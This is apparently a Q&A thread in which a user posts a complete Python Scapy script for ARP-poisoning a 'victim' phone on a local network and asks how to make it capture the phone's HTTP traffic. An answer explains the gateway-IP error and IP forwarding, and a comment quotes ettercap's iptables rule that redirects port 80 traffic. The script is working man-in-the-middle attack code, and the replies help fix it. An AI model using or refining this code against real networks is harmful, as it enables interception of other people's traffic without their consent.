# Scapy ARP poison does not receive any HTTP requests

Tags: python-2.7, sockets, scapy, arp

Using the code found at the bottom, I'm attempting to arp poison a target on my network (in this case, an iPhone).

However, while in use, it does not pick up if the phone goes to a website or anything really.  All it picks up are something along the lines of :

```
Ether / ARP who has 1xx.1xx.x.17 says xxx.xxx.x.5
Ether / ARP is at 00:5x:cx:8x:6x:61 says 1xx.xxx.x.17
Ether / ARP is at 00:2x:c7:6x:xx:94 says 1xx.xxx.x.5
Ether / ARP is at 00:00:00:00:00:00 says 1xx.xxx.x.17
Ether / ARP is at 00:00:00:00:00:00 says 1xx.xxx.x.17
Ether / IP / UDP xxx.x.x.14:49152 > 239.255.255.250:1900 / Raw
Ether / IP / UDP xxx.xxx.x.51:49152 > 239.255.255.250:1900 / Raw
Ether / ARP who has xxx.xxx.x.14 says xxx.xxx.x.1
```

And plugging in any IPs recorded into`socket.gethostbyaddr` gives back stuff like `('a23-206-125-85.deploy.static.akamaitechnologies.com', [], ['23.206.125.85'])`, `('qm-in-f188.1e100.net', [], ['173.194.205.188'])`.

And these are recorded hundreds of times.
How can I modify the code so that it intercepts http requests coming from the phone?

Code:

```
import os
import sys
import time
import signal
import threading
import subprocess

from scapy.error import Scapy_Exception
from scapy.all import *

import getIP

class MitM():
    def __init__(self):
        """
        -get intro #
        -get variables(interface, gate, vict) #
        -get mac for gate + vict #
        -enable ip forwarding #
        -poison target #
        -listen for packets
        -close with 'finally' loop
            -disable ip forwarding
            -restore targets
            -exit
        """
        self.intro()  # Broadcast Ping + Arp -a


        #####VARIABLES###
        print("**Interface used is 'wlan0' \n")

        self.Interface = 'wlan0'

        conf.verb = 0
        conf.interface = self.Interface
        self.VictIP = raw_input("**Enter Victim's Ip Address: ")

        self.GateIP = (getIP.ip())
        print("\n**Gateway is your computer(%s)" % (self.GateIP))

        print("**Enabling IP Forwarding...")
        subprocess.call(['echo',' 1 >', '/proc/sys/net/ipv4/ip_forward'])

        self.HardMAC = subprocess.check_output(['ethtool','-P', self.Interface]).split()[2]

        self.GateMAC = self.HardMAC
        self.VictMAC = self.getMAC(self.VictIP)

        print("**VictMAC is %s" % (self.VictMAC))
        print("**GateMAC is %s" % (self.GateMAC))

        self.monitor()

    def intro(self):
        """Use Subprocess to get 'ping' backs and 'arp' for clean processing."""
        print('\nPinging Network Address %s.255' % (getIP.ip()[:9]))

        self.NULL = open(os.devnull)  # TODO: close file at end of hack
        subprocess.call(['ping', '-c','4','-b','%s.255' % (getIP.ip()[:9])], stdout=self.NULL)

        arp = subprocess.check_output(['arp','-a'])
        arpNames = arp.split()[::7]
        arpIP = arp.split()[1::7]
        for combo in zip(arpNames, arpIP):
            print("%s --> %s" % (combo[0], combo[1]))
        print("")


    def getMAC(self,ip):
        conf.verb = 0
        ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ ARP(pdst=ip), timeout=2, \
                     iface=self.Interface, inter=0.1)
        for snd,recv in ans:
            return recv.sprintf(r"%Ether.src%")


    def ARP_poison(self,gatewayIP, gatewayMAC, victimIP, victimMAC):
        poison_target = ARP(op=2, psrc=gatewayIP, pdst=victimIP, hwdst=victimMAC)
        poison_gateway = ARP(op=2, psrc=victimIP, pdst=gatewayIP, hwdst=gatewayMAC)

        print("**Poisoning Target %s" % (self.VictIP))

        if True:
            try:
                send(poison_target)
                send(poison_gateway)
                time.sleep(0.5)

            except KeyboardInterrupt:
                print("\n**Exiting Script...")
                self.restore(self.GateIP, self.GateMAC, self.VictIP, self.VictMAC)
                sys.exit(1)
        return


    def restore(self, GatewayIP, GatewayMAC, VictimIP, VictimMAC):
        print("**Restoring Targets...\n")
        send(ARP(op=2, psrc=GatewayIP, pdst=VictimIP, hwdst="ff:ff:ff:ff:ff:ff", \
                 hwsrc=GatewayMAC), count=5)
        send(ARP(op=2, psrc=VictimIP, pdst=GatewayIP, hwdst="ff:ff:ff:ff:ff:ff", \
                 hwsrc=VictimMAC), count=5)
        sys.exit(1)

    def monitor(self):

        poison_thread = threading.Thread(target=self.ARP_poison, args= (self.GateIP, self.GateMAC, 
                                                                   self.VictIP, self.VictMAC))
        poison_thread.start()
        #self.ARP_poison(self.GateIP, self.GateMAC, self.VictIP, self.VictMAC)


        try:
            print("**Sniffing for packets...\n")
            bpf_filter = ('IP host ' + str(self.VictIP))
            packets = sniff( prn= lambda x: x.summary(), count=1000)
            wrpcap('packets.pcap', packets)

        except Exception:
            print("Exiting Script...\n")
            sys.exit(1)

        finally:
            self.restore(self.GateIP, self.GateMAC, self.VictIP, self.VictMAC)
            subprocess.call(['echo',' 0 >', '/proc/sys/net/ipv4/ip_forward'])
            poison_thread.close()
            sys.exit(1)


if __name__ == "__main__":
    MitM()
```

getIP.py:

```
import socket


def ip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    s.connect(('google.com', 0))

    return s.getsockname()[0]
```

Answer (score 0):

**TL;DR** `getIP.py` is wrong, there is no portable way to find the gateway IP.  Just find the gateway IP by hand and give it to the script.

---

#### On the gateway IP

I have the impression that you're confusing ARP and IP.

To perform ARP poisoning you need to make the iPhone think that the MAC of the attacking machine is the MAC of the IP that points to the gateway (the router).  The gateway IP is certainly a private IP and what you are getting in your `getIP.py` script is a private IP but it is not the gateway IP.

There is no OS independent way to get the gateway IP.  If you are on linux `ip r l` will show you the gateway IP under the name `default`, on windows `ipconfig` prints the gateway IP.  You should either add that as a top level variable in the script or ask for it as a command line parameter.

The reason that there is not a way to know the network gateway from the network traffic itself is one of the reasons why an ARP poisoning attack works.

---

#### On ARP poisoning

The first rule of ARP poisoning is that no IPs change.  It works on the IP layer of the OSI stack and below.  HTTP is much higher, there isn't a way to get HTTP traffic only, or TCP traffic only, or UDP traffic only in an ARP poisoning attack.  What you get is the IP layer, and **all** protocols that are on top of it will either go through your attacking machine (if the attack works) or will not go (if the attack fails).

This gives us the second rule of ARP poisoning: All network traffic from the victim machine will now go through the attacking machine, no exceptions.  If the attacking machine is not forwarding the network traffic the victim will believe it has the wrong ARP info about the gateway and keep resending ARP packets to find the correct MAC address for the gateway.

I see in your code the ARP poisoning itself, but I'm not 100% sure that:

```
subprocess.call(['echo',' 1 >', '/proc/sys/net/ipv4/ip_forward'])
```

Will actually allow you to see the packets in userspace.  I'd be cautious and think that that code just makes the kernel flip some flag that allows the NIC to rewrite MACs and send them back.  i.e. that the forwarded packets may never go deeper than the NIC.  I'd try to write the forward on a higher level (`iptables`) to make sure that the packets get into userspace.

---

#### Extra note

There are several protections against ARP poisoning.  The most common being freezing records in the ARP table, i.e. once an ARP record is known it cannot be changes by new ARP packets.  There is a chance that an iPhone might use such protection.

Comment: Thank you so much for your input @grochmal.  What would you suggest I do in place of the subprocess call in order to make the packets visible in the user space?

Comment: @JohnDoe - Personally, when I play with ARP poisoning I'm lazy and just use [ettercap](https://github.com/Ettercap/ettercap) which does the redirection for me.  But looking inside it I can see that it is doing this: `iptables -t nat -A PREROUTING -i %iface -p tcp --dport 80 -j REDIRECT --to-port 8000` (yes, it is doing a port redirection too).  But see [this security.SE answer](http://security.stackexchange.com/a/96625/112042) for a very detailed point about iptables and ARP poisoning.